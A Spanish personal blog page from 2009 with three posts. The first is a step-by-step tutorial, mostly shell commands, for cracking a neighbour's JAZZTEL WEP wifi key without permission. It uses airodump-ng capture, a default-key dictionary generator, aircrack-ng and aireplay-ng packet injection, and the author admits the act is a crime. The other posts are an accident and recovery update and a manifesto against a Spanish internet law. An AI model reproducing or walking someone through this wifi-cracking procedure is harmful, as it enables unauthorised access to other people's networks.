viernes, 11 de diciembre de 2009

Hackear wifi tipo JAZZTEL_XX con Ubuntu 9.04 [testeado]

Bueno pues como mal vecino, me puse a intentar conseguir internet en mi piso compartido. Y tras un breve analisis de redes encontre una red llamada JAZZTEL_XX, y me puse a buscar información de como hackear la red (en realidad soy un lammer, que uso herramientas de otros). yo lo he realizado con la tarjeta wifi intel pro 2200 b/g (ipw2200). Aqui os dejo el manual:

En primer lugar hay que instalar las herramientas necesarias. Yo cogí las del repositorio de ubuntu:

shell#sudo apt-get install aircrack-ng gcc

Luego existe una libreria/ejecutable que realizo alguien, que realiza un diccionario con las posibles claves qeu vienen por defecto para estas redes (yo lo he usado pero no es necesario) y se encuentra en este enlace. Para hacer usio de este ejecutable realizamos lo siguiente:

shell#gcc jazzdecripter.c jazzdecripter

Para ver las redes que tienes a tu alcance realizamos lo siguiente:

shell#airodump-ng

En mi caso:

shell#airodump-ng eth1

Aqui cogemos y apuntamos el BBSID ( debe empezar por 00:1A:2B:XX:XX:XX si es de jazztel el router) y el canal en el que opera. Tras esto realizaremos el diccionario, este paso no es estrictamente necesario, pero bueno os lo pongo por si acaso.

shell#./jazzdecripter diccionario.txt

En mi caso:

shell#./jazzdecripter 00:1A:2B:XX:XX:XX JAZZTEL_XX diccionario.txt

Tras tener el objetivo comenzaremos lo que es propiamente el ataque. Lo primero que hay que realizar es capturar el trafico en un archivo, lo realizaremos con lo siguiente:

shell#airodump-ng -w archivo.cap -c --bssid 00:1A:2B:XX:XX:XX

Yo para mi caso al no haber mucho trafico de otras redes, por vagueza no puso el filtro de --bssid, y solo filtre por canal, quedo asi:

shell#airodump-ng -w jazztel -c 11 eth1

Una vez empezada la captura, la dejamos capturando, y en otra shell distinta. Realizaremos el ataque al password. Mencionaros que es necesario como mínimo con el ataque mediante diccionario tener 5 iv-s. En caso de uqe no sea un password por defecto es necesarioo para una clave de 128 unos 120000 iv-s. El comando a ejecutar en la nueva shell para el caso con el diccionario es el siguiente:

shell2#aircrack-ng -w diccionario.txt

Caso sin diccionario:

shell2#aircrack-ng

En mi caso el comando quedo asi:

shell2#aircrack-ng jazztel-01.cap -w diccionario.txt

Este comando lo dejais en background y se va usando cada 5000 ivs que recopilamos. Y una vez que encuentre la clave os la dará.


Como podeis imaginar si no hay nadie transmitiendo conseguir los paquees necesarios es un poco dificil, en mi caso habia un cliente y aun asi me costo del orden de 3 horas conseguir los necesarios iv-s para conseguir la clave de 128. Exsite una opcion qeu es la de inyectar tráfico, y es la siguiente:

shell3#aireplay-ng -3 -x 1023 -g 1000000 -b -h 00:11:22:33:44:55 -i

En mi caso seria necesario habilitar el modo monitor de la tarjeta obteniendo un nuevo interfaz por el que poder inyectar el nuevo trafico. El comando quedaria asi:

shell3#aireplay-ng -3 -x 1023 -g 1000000 -b 00:1A:2B:XX:XX:XX -h 00:11:22:33:44:55 -i rtap0 eth1


Editado: Bueno ya para terminar os pongo como unir las capturas (.cap), ya que puede ser muy tedioso esperar a conseguir los paquetes necesarios. Para ello es necesario tener instalado el paquete wireshark-common:

shell4#sudo apt-get install wireshark wireshark-common

para unir los paquetes usaremos mergecap, de la siguiente forma:

shell4#mergecap -w juntado.cap captura1.cap captura2.cap capturaX.cap


Espero que tengais suerte y no haber escrito nada con fallos. Y bueno comentar finalmente que todo lo que hagais es bajo vuestra responsabilidad cometer el delito.

Semanas accidentadas

Tras varios días sin actualizar mi estado como se diría en tuenti facebook, voy a actualizar el blog, jejeje. Como podéis ver el título semanas accidentadas, es bastante claro, tras el accidente ya conocido de la rotura de ligamentos del tobillo, ha venido otro accidente, pero en este caso no ha tenido consecuencias de salud hacia mi cuerpo humano. Las consecuencias han sido hacia mi vehículo, en la mañana del lunes de hace dos semanas tuve un percance por culpa del hielo, y me choque contra la parte trasera del camión a una velocidad no superior a 40 km/h. El resultado es el que se puede ver en la foto.


En cuanto a mi vida personal, no me quejo. Las cosas no van mal, voy recuperandome de la lesión. Y ya he empezado la rehabilitación. En San Sebastian, estoy cogiendo el ritmo de vida, y también algunas cosillas mas, jejeje.

Bueno con esto y un bizcocho, hasta mañana a las 8. Y no es broma, porque tenemos ¡¡¡CENA!!!

PD: Si alguien necesita/quiere invitaciones de google Wave, que me lo comente.

miércoles, 2 de diciembre de 2009

En defensa de los derechos fundamentales en Internet

Ante la inclusión en el Anteproyecto de Ley de Economía Sostenible de modificaciones legislativas que afectan al libre ejercicio de las libertades de expresión, información y el derecho de acceso a la cultura a través de Internet, los periodistas, bloggers, usuarios, profesionales y creadores de Internet manifestamos nuestra firme oposición al proyecto, y declaramos que…

1.- Los derechos de autor no pueden situarse por encima de los derechos fundamentales de los ciudadanos, como el derecho a la privacidad, a la seguridad, a la presunción de inocencia, a la tutela judicial efectiva y a la libertad de expresión.

2.- La suspensión de derechos fundamentales es y debe seguir siendo competencia exclusiva del poder judicial. Ni un cierre sin sentencia. Este anteproyecto, en contra de lo establecido en el artículo 20.5 de la Constitución, pone en manos de un órgano no judicial -un organismo dependiente del Ministerio de Cultura-, la potestad de impedir a los ciudadanos españoles el acceso a cualquier página web.

3.- La nueva legislación creará inseguridad jurídica en todo el sector tecnológico español, perjudicando uno de los pocos campos de desarrollo y futuro de nuestra economía, entorpeciendo la creación de empresas, introduciendo trabas a la libre competencia y ralentizando su proyección internacional.

4.- La nueva legislación propuesta amenaza a los nuevos creadores y entorpece la creación cultural. Con Internet y los sucesivos avances tecnológicos se ha democratizado extraordinariamente la creación y emisión de contenidos de todo tipo, que ya no provienen prevalentemente de las industrias culturales tradicionales, sino de multitud de fuentes diferentes.

5.- Los autores, como todos los trabajadores, tienen derecho a vivir de su trabajo con nuevas ideas creativas, modelos de negocio y actividades asociadas a sus creaciones. Intentar sostener con cambios legislativos a una industria obsoleta que no sabe adaptarse a este nuevo entorno no es ni justo ni realista. Si su modelo de negocio se basaba en el control de las copias de las obras y en Internet no es posible sin vulnerar derechos fundamentales, deberían buscar otro modelo.

6.- Consideramos que las industrias culturales necesitan para sobrevivir alternativas modernas, eficaces, creíbles y asequibles y que se adecuen a los nuevos usos sociales, en lugar de limitaciones tan desproporcionadas como ineficaces para el fin que dicen perseguir.

7.- Internet debe funcionar de forma libre y sin interferencias políticas auspiciadas por sectores que pretenden perpetuar obsoletos modelos de negocio e imposibilitar que el saber humano siga siendo libre.

8.- Exigimos que el Gobierno garantice por ley la neutralidad de la Red en España, ante cualquier presión que pueda producirse, como marco para el desarrollo de una economía sostenible y realista de cara al futuro.

9.- Proponemos una verdadera reforma del derecho de propiedad intelectual orientada a su fin: devolver a la sociedad el conocimiento, promover el dominio público y limitar los abusos de las entidades gestoras.

10.- En democracia las leyes y sus modificaciones deben aprobarse tras el oportuno debate público y habiendo consultado previamente a todas las partes implicadas. No es de recibo que se realicen cambios legislativos que afectan a derechos fundamentales en una ley no orgánica y que versa sobre otra materia.

Este manifiesto, elaborado de forma conjunta por varios autores, es de todos y de ninguno. Si quieres sumarte a él, difúndelo por Internet.